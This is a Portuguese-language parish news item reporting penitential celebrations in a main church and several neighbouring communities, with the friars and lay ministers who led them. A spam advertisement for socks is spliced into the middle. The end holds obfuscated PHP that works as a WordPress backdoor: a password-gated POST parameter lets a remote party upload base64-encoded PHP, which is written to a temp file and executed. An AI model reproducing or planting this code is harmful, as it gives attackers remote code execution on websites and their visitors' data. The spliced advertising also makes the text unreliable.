Celebração Penitencial

Nesta segunda-feira,11 de abril, foi realizada na matriz e comunidades vizinhas a Celebração Penitencial.
Na matriz, foi presidida pelo Frei Cícero Alexandre. O Vigário Paroquial conduziu os presentes numa profunda reflexão acerca das faltas cometidas cotidianamente e a importância da busca do perdão e aproximação de Deus, através da oração, para não mais voltar a cometê-las. A celebração contou com a presença dos fiéis da comunidade e unção com água benta.
Na comunidade Santa Cecília, foi conduzida por Maisa, coordenadora do grupo Luz e Vida, e teve como ponto de reflexão a seguinte pergunta: Como está o relacionamento da comunidade com Deus? Em seguida, houve a aspersão da Água Benta nos fiéis.Artigo Patrocinado Encontre algo para todos em nossa coleção de meias coloridas, brilhantes e elegantes. Compre individualmente ou em pacotes para adicionar cor ao seu sock gaveta!
Na comunidade Nossa Senhora da Conceição, no Sobrado, a Celebração Penitencial foi celebrada por uma Ministra da Santa Eucaristia da comunidade, Dona Petronila, que enfatizou que devemos buscar a salvação e devemos estar sempre em sintonia com Cristo.
Na comunidade São José Operário, foi presidida por uma Ministra da Santa Eucaristia da comunidade, Dona Fátima, e contou com a presença de vários fiéis.
No Bom Pastor, o rito foi realizado pelo Frei Gilvan, o celebrante deixou uma palavra de esperança e carinho para os fiéis presentes. Explicou também que devemos viver um tempo de penitência e perdão, para deixarmos os nossos corações mais próximos de Deus.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}